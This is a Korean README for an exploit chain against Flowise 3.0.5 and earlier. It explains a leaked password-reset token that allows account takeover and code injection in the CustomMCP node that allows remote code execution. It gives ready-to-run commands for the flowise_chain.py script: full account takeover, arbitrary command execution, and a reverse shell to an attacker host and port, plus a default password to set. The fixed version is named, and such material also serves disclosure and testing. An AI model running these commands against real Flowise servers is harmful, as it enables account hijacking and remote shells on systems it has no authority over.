
CVE-2025-58434 및 CVE-2025-59528 연쇄 POC
Flowise <= 3.0.5에 영향을 미치는 두 가지 취약점에 대한 익스플로잇 체인입니다.
비밀번호 찾기 엔드포인트는 인증 없이 API 응답에 유효한 비밀번호 재설정 토큰을 반환합니다. 유효한 이메일 주소를 알고 있는 공격자는 사용자 상호작용 없이 모든 계정의 비밀번호를 재설정할 수 있습니다.
CustomMCP 노드는 사용자 제어 입력을 전체 Node.js 권한으로 Function() 생성자에 직접 전달합니다. 유효한 API 키를 가진 인증된 사용자는 Flowise 프로세스 사용자 권한으로 임의의 OS 명령을 실행할 수 있습니다.
수정 버전: Flowise 3.0.6
pip install requests전체 ATO 체인 (비밀번호 재설정, API 키 요청, 리버스 셸 실행):
python3 flowise_chain.py -t http://target -e [email protected]
RCE만 (이미 API 키가 있는 경우):
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"
기존 키로 리버스 셸:
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444
Flowise 3.0.5의 특성으로 인해 비밀번호 재설정 API 엔드포인트가 로그인 엔드포인트가 허용하는 자격 증명을 즉시 업데이트하지 않습니다. 스크립트는 재설정 후 일시 중지되며 UI에 수동으로 로그인하여 /apikey에서 API 키를 복사하라는 메시지를 표시합니다.
| Flag | 설명 |
|---|
-t, --target | 대상 URL |
-e, --email | 대상 계정 이메일 (ATO 체인 트리거) |
--api-key | API 키 직접 제공 (ATO 건너뛰기) |
-c, --command | 실행할 명령어 |
--lhost | 리버스 셸용 공격자 IP |
--lport | 리버스 셸용 공격자 포트 (기본값: 4444) |
--new-password | 재설정 중 설정할 비밀번호 (기본값: Pwn3d!2026) |
-k, --insecure | TLS 검증 건너뛰기 |